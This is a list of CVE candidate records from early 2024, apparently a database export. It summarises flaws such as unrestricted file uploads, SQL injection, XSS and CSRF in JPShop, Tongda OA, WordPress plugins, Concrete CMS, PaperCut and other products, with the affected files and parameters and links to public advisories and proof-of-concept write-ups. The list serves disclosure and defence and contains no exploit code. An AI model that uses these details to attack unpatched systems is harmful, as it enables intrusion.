CVE    2024    1264    Candidate    A vulnerability has been found in Juanpao JPShop up to 1.5.02 and classified as critical. Affected by this vulnerability is the function actionUpdate of the file /api/controllers/common/UploadsController.php. The manipulation of the argument imgage leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-253003.    MISC:https://note.zhaoj.in/share/f8b2IX7GsZS5   |   URL:https://note.zhaoj.in/share/f8b2IX7GsZS5   |   MISC:https://vuldb.com/?ctiid.253003   |   URL:https://vuldb.com/?ctiid.253003   |   MISC:https://vuldb.com/?id.253003   |   URL:https://vuldb.com/?id.253003    Assigned (20240206)
CVE    2024    1263    Candidate    A vulnerability, which was classified as critical, was found in Juanpao JPShop up to 1.5.02. Affected is the function actionUpdate of the file /api/controllers/merchant/shop/PosterController.php of the component API. The manipulation of the argument pic_url leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-253002 is the identifier assigned to this vulnerability.    MISC:https://note.zhaoj.in/share/Lkrp36sa1EHO   |   URL:https://note.zhaoj.in/share/Lkrp36sa1EHO   |   MISC:https://vuldb.com/?ctiid.253002   |   URL:https://vuldb.com/?ctiid.253002   |   MISC:https://vuldb.com/?id.253002   |   URL:https://vuldb.com/?id.253002    Assigned (20240206)
CVE    2024    1262    Candidate    A vulnerability, which was classified as critical, has been found in Juanpao JPShop up to 1.5.02. This issue affects the function actionUpdate of the file /api/controllers/merchant/design/MaterialController.php of the component API. The manipulation of the argument pic_url leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-253001 was assigned to this vulnerability.    MISC:https://note.zhaoj.in/share/C1btykKlahBD   |   URL:https://note.zhaoj.in/share/C1btykKlahBD   |   MISC:https://vuldb.com/?ctiid.253001   |   URL:https://vuldb.com/?ctiid.253001   |   MISC:https://vuldb.com/?id.253001   |   URL:https://vuldb.com/?id.253001    Assigned (20240206)
CVE    2024    1261    Candidate    A vulnerability classified as critical was found in Juanpao JPShop up to 1.5.02. This vulnerability affects the function actionIndex of the file /api/controllers/merchant/app/ComboController.php of the component API. The manipulation of the argument pic_url leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-253000.    MISC:https://note.zhaoj.in/share/v2JpHJngvw7E   |   URL:https://note.zhaoj.in/share/v2JpHJngvw7E   |   MISC:https://vuldb.com/?ctiid.253000   |   URL:https://vuldb.com/?ctiid.253000   |   MISC:https://vuldb.com/?id.253000   |   URL:https://vuldb.com/?id.253000    Assigned (20240206)
CVE    2024    1260    Candidate    A vulnerability classified as critical has been found in Juanpao JPShop up to 1.5.02. This affects the function actionIndex of the file /api/controllers/admin/app/ComboController.php of the component API. The manipulation of the argument pic_url leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252999.    MISC:https://note.zhaoj.in/share/H73DuWdyifaI   |   URL:https://note.zhaoj.in/share/H73DuWdyifaI   |   MISC:https://vuldb.com/?ctiid.252999   |   URL:https://vuldb.com/?ctiid.252999   |   MISC:https://vuldb.com/?id.252999   |   URL:https://vuldb.com/?id.252999    Assigned (20240206)
CVE    2024    1259    Candidate    A vulnerability was found in Juanpao JPShop up to 1.5.02. It has been rated as critical. Affected by this issue is some unknown functionality of the file /api/controllers/admin/app/AppController.php of the component API. The manipulation of the argument app_pic_url leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-252998 is the identifier assigned to this vulnerability.    MISC:https://note.zhaoj.in/share/rCt6PpJxBvuI   |   URL:https://note.zhaoj.in/share/rCt6PpJxBvuI   |   MISC:https://vuldb.com/?ctiid.252998   |   URL:https://vuldb.com/?ctiid.252998   |   MISC:https://vuldb.com/?id.252998   |   URL:https://vuldb.com/?id.252998    Assigned (20240206)
CVE    2024    1258    Candidate    A vulnerability was found in Juanpao JPShop up to 1.5.02. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file api/config/params.php of the component API. The manipulation of the argument JWT_KEY_ADMIN leads to use of hard-coded cryptographic key. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The identifier VDB-252997 was assigned to this vulnerability.    MISC:https://note.zhaoj.in/share/XblX1My7jNV7   |   URL:https://note.zhaoj.in/share/XblX1My7jNV7   |   MISC:https://vuldb.com/?ctiid.252997   |   URL:https://vuldb.com/?ctiid.252997   |   MISC:https://vuldb.com/?id.252997   |   URL:https://vuldb.com/?id.252997    Assigned (20240206)
CVE    2024    1257    Candidate    A vulnerability was found in Jspxcms 10.2.0. It has been classified as problematic. Affected is an unknown function of the file /ext/collect/find_text.do. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252996.    MISC:https://github.com/sweatxi/BugHub/blob/main/find_text_do.pdf   |   URL:https://github.com/sweatxi/BugHub/blob/main/find_text_do.pdf   |   MISC:https://vuldb.com/?ctiid.252996   |   URL:https://vuldb.com/?ctiid.252996   |   MISC:https://vuldb.com/?id.252996   |   URL:https://vuldb.com/?id.252996    Assigned (20240206)
CVE    2024    1256    Candidate    A vulnerability was found in Jspxcms 10.2.0 and classified as problematic. This issue affects some unknown processing of the file /ext/collect/filter_text.do. The manipulation leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252995.    MISC:https://github.com/sweatxi/BugHub/blob/main/filter_txet_do.pdf   |   URL:https://github.com/sweatxi/BugHub/blob/main/filter_txet_do.pdf   |   MISC:https://vuldb.com/?ctiid.252995   |   URL:https://vuldb.com/?ctiid.252995   |   MISC:https://vuldb.com/?id.252995   |   URL:https://vuldb.com/?id.252995    Assigned (20240206)
CVE    2024    1255    Candidate    A vulnerability has been found in sepidz SepidzDigitalMenu up to 7.1.0728.1 and classified as problematic. This vulnerability affects unknown code of the file /Waiters. The manipulation leads to information disclosure. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-252994 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://vuldb.com/?ctiid.252994   |   URL:https://vuldb.com/?ctiid.252994   |   MISC:https://vuldb.com/?id.252994   |   URL:https://vuldb.com/?id.252994    Assigned (20240206)
CVE    2024    1254    Candidate    A vulnerability, which was classified as critical, was found in Beijing Baichuo Smart S20 Management Platform up to 20231120. This affects an unknown part of the file /sysmanage/sysmanageajax.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252993 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://github.com/rockersiyuan/CVE/blob/main/Smart%20S20.md   |   URL:https://github.com/rockersiyuan/CVE/blob/main/Smart%20S20.md   |   MISC:https://vuldb.com/?ctiid.252993   |   URL:https://vuldb.com/?ctiid.252993   |   MISC:https://vuldb.com/?id.252993   |   URL:https://vuldb.com/?id.252993    Assigned (20240206)
CVE    2024    1253    Candidate    A vulnerability, which was classified as critical, has been found in Beijing Baichuo Smart S40 Management Platform up to 20240126. Affected by this issue is some unknown functionality of the file /useratte/web.php of the component Import Handler. The manipulation of the argument file_upload leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252992. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://github.com/b51s77/cve/blob/main/upload.md   |   URL:https://github.com/b51s77/cve/blob/main/upload.md   |   MISC:https://vuldb.com/?ctiid.252992   |   URL:https://vuldb.com/?ctiid.252992   |   MISC:https://vuldb.com/?id.252992   |   URL:https://vuldb.com/?id.252992    Assigned (20240206)
CVE    2024    1252    Candidate    A vulnerability classified as critical was found in Tongda OA 2017 up to 11.9. Affected by this vulnerability is an unknown functionality of the file /general/attendance/manage/ask_duty/delete.php. The manipulation of the argument ASK_DUTY_ID leads to sql injection. The exploit has been disclosed to the public and may be used. Upgrading to version 11.10 is able to address this issue. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-252991.    MISC:https://github.com/b51s77/cve/blob/main/sql.md   |   URL:https://github.com/b51s77/cve/blob/main/sql.md   |   MISC:https://vuldb.com/?ctiid.252991   |   URL:https://vuldb.com/?ctiid.252991   |   MISC:https://vuldb.com/?id.252991   |   URL:https://vuldb.com/?id.252991    Assigned (20240206)
CVE    2024    1251    Candidate    A vulnerability classified as critical has been found in Tongda OA 2017 up to 11.10. Affected is an unknown function of the file /general/email/outbox/delete.php. The manipulation of the argument DELETE_STR leads to sql injection. The exploit has been disclosed to the public and may be used. VDB-252990 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://github.com/rockersiyuan/CVE/blob/main/TongDa%20Sql%20inject.md   |   URL:https://github.com/rockersiyuan/CVE/blob/main/TongDa%20Sql%20inject.md   |   MISC:https://vuldb.com/?ctiid.252990   |   URL:https://vuldb.com/?ctiid.252990   |   MISC:https://vuldb.com/?id.252990   |   URL:https://vuldb.com/?id.252990    Assigned (20240206)
CVE    2024    1250    Candidate    An issue has been discovered in GitLab EE affecting all versions starting from 16.8 before 16.8.2. When a user is assigned a custom role with manage_group_access_tokens permission, they may be able to create group access tokens with Owner privileges, which may lead to privilege escalation.    MISC:GitLab Issue #439175   |   URL:https://gitlab.com/gitlab-org/gitlab/-/issues/439175    Assigned (20240206)
CVE    2024    1247    Candidate    Concrete CMS version 9 before 9.2.5 is vulnerable to stored XSS via the Role Name field since there is insufficient validation of administrator provided data for that field. A rogue administrator could inject malicious code into the Role Name field which might be executed when users visit the affected page. The Concrete CMS Security team scored this 2 with CVSS v3 vector AV:N/AC:H/PR:H/UI:R/S:U/C:N/I:L/A:N https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator . Concrete versions below 9 do not include group types so they are not affected by this vulnerability.    MISC:https://documentation.concretecms.org/9-x/developers/introduction/version-history/925-release-notes   |   URL:https://documentation.concretecms.org/9-x/developers/introduction/version-history/925-release-notes   |   MISC:https://www.concretecms.org/about/project-news/security/2024-02-04-security-advisory   |   URL:https://www.concretecms.org/about/project-news/security/2024-02-04-security-advisory    Assigned (20240206)
CVE    2024    1246    Candidate    Concrete CMS in version 9 before 9.2.5 is vulnerable to reflected XSS via the Image URL Import Feature due to insufficient validation of administrator provided data. A rogue administrator could inject malicious code when importing images, leading to the execution of the malicious code on the website user’s browser. The Concrete CMS Security team scored this 2 with CVSS v3 vector AV:N/AC:H/PR:H/UI:R/S:U/C:L/I:N/A:N. This does not affect Concrete versions prior to version 9.    MISC:https://documentation.concretecms.org/9-x/developers/introduction/version-history/925-release-notes   |   URL:https://documentation.concretecms.org/9-x/developers/introduction/version-history/925-release-notes   |   MISC:https://www.concretecms.org/about/project-news/security/2024-02-04-security-advisory   |   URL:https://www.concretecms.org/about/project-news/security/2024-02-04-security-advisory    Assigned (20240206)
CVE    2024    1245    Candidate    Concrete CMS version 9 before 9.2.5 is vulnerable to stored XSS in file tags and description attributes since administrator entered file attributes are not sufficiently sanitized in the Edit Attributes page. A rogue administrator could put malicious code into the file tags or description attributes and, when another administrator opens the same file for editing, the malicious code could execute. The Concrete CMS Security team scored this 2.4 with CVSS v3 vector AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:N/A:N.    MISC:https://documentation.concretecms.org/9-x/developers/introduction/version-history/925-release-notes   |   URL:https://documentation.concretecms.org/9-x/developers/introduction/version-history/925-release-notes   |   MISC:https://www.concretecms.org/about/project-news/security/2024-02-04-security-advisory   |   URL:https://www.concretecms.org/about/project-news/security/2024-02-04-security-advisory    Assigned (20240206)
CVE    2024    1242    Candidate    The Premium Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the button onclick attribute in all versions up to, and including, 4.10.18 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3035504%40premium-addons-for-elementor%2Ftrunk&old=3025571%40premium-addons-for-elementor%2Ftrunk&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3035504%40premium-addons-for-elementor%2Ftrunk&old=3025571%40premium-addons-for-elementor%2Ftrunk&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/1026b753-e82b-4fa3-9023-c36ab9863b29?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/1026b753-e82b-4fa3-9023-c36ab9863b29?source=cve    Assigned (20240205)
CVE    2024    1239    Candidate    The ElementsKit Elementor addons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the blog post read more button in all versions up to, and including, 3.0.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3042291%40elementskit-lite&new=3042291%40elementskit-lite&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3042291%40elementskit-lite&new=3042291%40elementskit-lite&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/1822fd58-0dba-4b15-9702-32e3aa4405b3?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/1822fd58-0dba-4b15-9702-32e3aa4405b3?source=cve    Assigned (20240205)
CVE    2024    1237    Candidate    The Elementor Header & Footer Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the flyout_layout attribute in all versions up to, and including, 1.6.24 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/browser/header-footer-elementor/tags/1.6.24/inc/widgets-manager/widgets/class-navigation-menu.php#L1951   |   URL:https://plugins.trac.wordpress.org/browser/header-footer-elementor/tags/1.6.24/inc/widgets-manager/widgets/class-navigation-menu.php#L1951   |   MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3034938%40header-footer-elementor&new=3034938%40header-footer-elementor&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3034938%40header-footer-elementor&new=3034938%40header-footer-elementor&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/82644c46-205b-4005-bba8-6b3e45769639?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/82644c46-205b-4005-bba8-6b3e45769639?source=cve    Assigned (20240205)
CVE    2024    1236    Candidate    The Essential Addons for Elementor – Best Elementor Templates, Widgets, Kits & WooCommerce Builders plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Filterable Controls label icon parameter in all versions up to, and including, 5.9.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/browser/essential-addons-for-elementor-lite/trunk/includes/Elements/Filterable_Gallery.php#L3259   |   URL:https://plugins.trac.wordpress.org/browser/essential-addons-for-elementor-lite/trunk/includes/Elements/Filterable_Gallery.php#L3259   |   MISC:https://plugins.trac.wordpress.org/browser/essential-addons-for-elementor-lite/trunk/includes/Elements/Filterable_Gallery.php#L3261   |   URL:https://plugins.trac.wordpress.org/browser/essential-addons-for-elementor-lite/trunk/includes/Elements/Filterable_Gallery.php#L3261   |   MISC:https://plugins.trac.wordpress.org/changeset/3034127/essential-addons-for-elementor-lite/trunk/includes/Elements/Filterable_Gallery.php   |   URL:https://plugins.trac.wordpress.org/changeset/3034127/essential-addons-for-elementor-lite/trunk/includes/Elements/Filterable_Gallery.php   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/43014ecd-72d9-44cc-be24-c0c9790ddc20?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/43014ecd-72d9-44cc-be24-c0c9790ddc20?source=cve    Assigned (20240205)
CVE    2024    1235    Candidate    The Elementor Addons by Livemesh plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the custom class field in all versions up to, and including, 8.3.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/browser/addons-for-elementor/trunk/templates/addons/device-slider/loop.php#L33   |   URL:https://plugins.trac.wordpress.org/browser/addons-for-elementor/trunk/templates/addons/device-slider/loop.php#L33   |   MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3032737%40addons-for-elementor%2Ftrunk&old=3026261%40addons-for-elementor%2Ftrunk&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3032737%40addons-for-elementor%2Ftrunk&old=3026261%40addons-for-elementor%2Ftrunk&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/70bda4b7-e442-4956-b3cb-8df96043bcde?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/70bda4b7-e442-4956-b3cb-8df96043bcde?source=cve    Assigned (20240205)
CVE    2024    1234    Candidate    The Exclusive Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via data attribute in all versions up to, and including, 2.6.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/changeset/3042217/exclusive-addons-for-elementor   |   URL:https://plugins.trac.wordpress.org/changeset/3042217/exclusive-addons-for-elementor   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/1b87fe3d-a88d-477a-8d91-4d7c2dba4a43?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/1b87fe3d-a88d-477a-8d91-4d7c2dba4a43?source=cve    Assigned (20240205)
CVE    2024    1232    Candidate    The CM Download Manager WordPress plugin before 2.9.0 does not have CSRF checks in some places, which could allow attackers to make logged in admins delete downloads via a CSRF attack.    MISC:https://wpscan.com/vulnerability/2a29b509-4cd5-43c8-84f4-f86251dd28f8/   |   URL:https://wpscan.com/vulnerability/2a29b509-4cd5-43c8-84f4-f86251dd28f8/    Assigned (20240205)
CVE    2024    1231    Candidate    The CM Download Manager WordPress plugin before 2.9.0 does not have CSRF checks in some places, which could allow attackers to make logged in admins unpublish downloads via a CSRF attack.    MISC:https://wpscan.com/vulnerability/7d3968d9-61ed-4c00-8764-0360cf03255e/   |   URL:https://wpscan.com/vulnerability/7d3968d9-61ed-4c00-8764-0360cf03255e/    Assigned (20240205)
CVE    2024    1227    Candidate    An open redirect vulnerability, the exploitation of which could allow an attacker to create a custom URL and redirect a legitimate page to a malicious site.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-rejettos-http-file-server   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-rejettos-http-file-server    Assigned (20240205)
CVE    2024    1226    Candidate    The software does not neutralize or incorrectly neutralizes certain characters before the data is included in outgoing HTTP headers. The inclusion of unvalidated data in an HTTP header allows an attacker to specify the full HTTP response rendered by the browser. An attacker could control the response and craft attacks such as cross-site scripting and cache poisoning attacks.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-rejettos-http-file-server   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-rejettos-http-file-server    Assigned (20240205)
CVE    2024    1225    Candidate    A vulnerability classified as critical was found in QiboSoft QiboCMS X1 up to 1.0.6. Affected by this vulnerability is the function rmb_pay of the file /application/index/controller/Pay.php. The manipulation of the argument callback_class leads to deserialization. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252847. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://note.zhaoj.in/share/jDWk6INLzO12   |   URL:https://note.zhaoj.in/share/jDWk6INLzO12   |   MISC:https://vuldb.com/?ctiid.252847   |   URL:https://vuldb.com/?ctiid.252847   |   MISC:https://vuldb.com/?id.252847   |   URL:https://vuldb.com/?id.252847    Assigned (20240205)
CVE    2024    1224    Candidate    This vulnerability exists in USB Pratirodh due to the usage of a weaker cryptographic algorithm (hash) SHA1 in user login component. A local attacker with administrative privileges could exploit this vulnerability to obtain the password of USB Pratirodh on the targeted system. Successful exploitation of this vulnerability could allow the attacker to take control of the application and modify the access control of registered users or devices on the targeted system.    MISC:https://www.cert-in.org.in/s2cMainServlet?pageid=PUBVLNOTES01&VLCODE=CIVN-2024-0080   |   URL:https://www.cert-in.org.in/s2cMainServlet?pageid=PUBVLNOTES01&VLCODE=CIVN-2024-0080    Assigned (20240205)
CVE    2024    1223    Candidate    This vulnerability potentially allows unauthorized enumeration of information from the embedded device APIs. An attacker must already have existing knowledge of some combination of valid usernames, device names and an internal system key. For such an attack to be successful the system must be in a specific runtime state.    MISC:https://www.papercut.com/kb/Main/Security-Bulletin-March-2024   |   URL:https://www.papercut.com/kb/Main/Security-Bulletin-March-2024    Assigned (20240205)
CVE    2024    1222    Candidate    This allows attackers to use a maliciously formed API request to gain access to an API authorization level with elevated privileges. This applies to a small subset of PaperCut NG/MF API calls.    MISC:https://www.papercut.com/kb/Main/Security-Bulletin-March-2024   |   URL:https://www.papercut.com/kb/Main/Security-Bulletin-March-2024    Assigned (20240205)
CVE    2024    1221    Candidate    This vulnerability potentially allows files on a PaperCut NG/MF server to be exposed using a specifically formed payload against the impacted API endpoint. The attacker must carry out some reconnaissance to gain knowledge of a system token. This CVE only affects Linux and macOS PaperCut NG/MF servers.    MISC:https://www.papercut.com/kb/Main/Security-Bulletin-March-2024   |   URL:https://www.papercut.com/kb/Main/Security-Bulletin-March-2024    Assigned (20240205)
CVE    2024    1220    Candidate    A stack-based buffer overflow in the built-in web server in Moxa NPort W2150A/W2250A Series firmware version 2.3 and prior allows a remote attacker to exploit the vulnerability by sending crafted payload to the web service. Successful exploitation of the vulnerability could result in denial of service.    MISC:https://www.moxa.com/en/support/product-support/security-advisory/mpsa-238975-nport-w2150a-w2250a-series-web-server-stack-based-buffer-overflow-vulnerability   |   URL:https://www.moxa.com/en/support/product-support/security-advisory/mpsa-238975-nport-w2150a-w2250a-series-web-server-stack-based-buffer-overflow-vulnerability    Assigned (20240205)
CVE    2024    1218    Candidate    The Contact Form builder with drag & drop for WordPress – Kali Forms plugin for WordPress is vulnerable to unauthorized access and modification of data via API due to an inconsistent capability check on several REST endpoints in all versions up to, and including, 2.3.41. This makes it possible for authenticated attackers, with contributor access and higher, to obtain access to or modify forms or entries.    MISC:https://plugins.trac.wordpress.org/changeset/3036466/kali-forms/trunk?contextall=1&old=3029334&old_path=%2Fkali-forms%2Ftrunk   |   URL:https://plugins.trac.wordpress.org/changeset/3036466/kali-forms/trunk?contextall=1&old=3029334&old_path=%2Fkali-forms%2Ftrunk   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/ed1aae32-6040-4c42-b8a7-4c3be371a8c0?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/ed1aae32-6040-4c42-b8a7-4c3be371a8c0?source=cve    Assigned (20240202)
CVE    2024    1217    Candidate    The Contact Form builder with drag & drop for WordPress – Kali Forms plugin for WordPress is vulnerable to unauthorized plugin deactivation due to a missing capability check on the await_plugin_deactivation function in all versions up to, and including, 2.3.41. This makes it possible for authenticated attackers, with subscriber access or higher, to deactivate any active plugins.    MISC:https://plugins.trac.wordpress.org/changeset/3036466/kali-forms/trunk?contextall=1&old=3029334&old_path=%2Fkali-forms%2Ftrunk   |   URL:https://plugins.trac.wordpress.org/changeset/3036466/kali-forms/trunk?contextall=1&old=3029334&old_path=%2Fkali-forms%2Ftrunk   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/7be75b0a-737d-4f0d-b024-e207af4573cd?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/7be75b0a-737d-4f0d-b024-e207af4573cd?source=cve    Assigned (20240202)
CVE    2024    1215    Candidate    A vulnerability was found in SourceCodester CRUD without Page Reload 1.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the file fetch_data.php. The manipulation of the argument username/city leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-252782 is the identifier assigned to this vulnerability.    MISC:https://github.com/PrecursorYork/crud-without-refresh-reload-Reflected_XSS-POC/blob/main/README.md   |   URL:https://github.com/PrecursorYork/crud-without-refresh-reload-Reflected_XSS-POC/blob/main/README.md   |   MISC:https://vuldb.com/?ctiid.252782   |   URL:https://vuldb.com/?ctiid.252782   |   MISC:https://vuldb.com/?id.252782   |   URL:https://vuldb.com/?id.252782    Assigned (20240202)
CVE    2024    1214    Candidate    The Easy Social Feed – Social Photos Gallery – Post Feed – Like Box plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 6.5.4. This is due to missing or incorrect nonce validation on the save_groups_list function. This makes it possible for unauthenticated attackers to disconnect a site's facebook or instagram page/group connection via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.    MISC:https://plugins.trac.wordpress.org/browser/easy-facebook-likebox/trunk/facebook/admin/class-easy-facebook-likebox-admin.php?rev=3047064   |   URL:https://plugins.trac.wordpress.org/browser/easy-facebook-likebox/trunk/facebook/admin/class-easy-facebook-likebox-admin.php?rev=3047064   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/aaf62045-b9ce-40d7-92b3-7ab683e5a08c?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/aaf62045-b9ce-40d7-92b3-7ab683e5a08c?source=cve    Assigned (20240202)
CVE    2024    1213    Candidate    The Easy Social Feed – Social Photos Gallery – Post Feed – Like Box plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 6.5.4. This is due to missing or incorrect nonce validation on the esf_insta_save_access_token and efbl_save_facebook_access_token functions. This makes it possible for unauthenticated attackers to connect their facebook and instagram pages to the site via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3047064%40easy-facebook-likebox&new=3047064%40easy-facebook-likebox&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3047064%40easy-facebook-likebox&new=3047064%40easy-facebook-likebox&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/262dcea7-3ac4-43ee-90d7-91f200c3496c?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/262dcea7-3ac4-43ee-90d7-91f200c3496c?source=cve    Assigned (20240202)
CVE    2024    1212    Candidate    Unauthenticated remote attackers can access the system through the LoadMaster management interface, enabling arbitrary system command execution.    MISC:https://freeloadbalancer.com/   |   URL:https://freeloadbalancer.com/   |   MISC:https://kemptechnologies.com/   |   URL:https://kemptechnologies.com/   |   MISC:https://support.kemptechnologies.com/hc/en-us/articles/23878931058445-LoadMaster-Security-Vulnerability-CVE-2024-1212   |   URL:https://support.kemptechnologies.com/hc/en-us/articles/23878931058445-LoadMaster-Security-Vulnerability-CVE-2024-1212   |   MISC:https://support.kemptechnologies.com/hc/en-us/articles/24325072850573-Release-Notice-LMOS-7-2-59-2-7-2-54-8-7-2-48-10-CVE-2024-1212   |   URL:https://support.kemptechnologies.com/hc/en-us/articles/24325072850573-Release-Notice-LMOS-7-2-59-2-7-2-54-8-7-2-48-10-CVE-2024-1212    Assigned (20240202)
CVE    2024    1210    Candidate    The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.1 via API. This makes it possible for unauthenticated attackers to obtain access to quizzes.    MISC:https://github.com/karlemilnikka/CVE-2024-1208-and-CVE-2024-1210   |   URL:https://github.com/karlemilnikka/CVE-2024-1208-and-CVE-2024-1210   |   MISC:https://www.learndash.com/release-notes/   |   URL:https://www.learndash.com/release-notes/   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/61ca5ab6-5fe9-4313-9b0d-8736663d0e89?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/61ca5ab6-5fe9-4313-9b0d-8736663d0e89?source=cve    Assigned (20240202)
CVE    2024    1209    Candidate    The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.1 via direct file access due to insufficient protection of uploaded assignments. This makes it possible for unauthenticated attackers to obtain those uploads.    MISC:https://github.com/karlemilnikka/CVE-2024-1209   |   URL:https://github.com/karlemilnikka/CVE-2024-1209   |   MISC:https://www.learndash.com/release-notes/   |   URL:https://www.learndash.com/release-notes/   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/7191955e-0db1-4ad1-878b-74f90ca59c91?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/7191955e-0db1-4ad1-878b-74f90ca59c91?source=cve    Assigned (20240202)
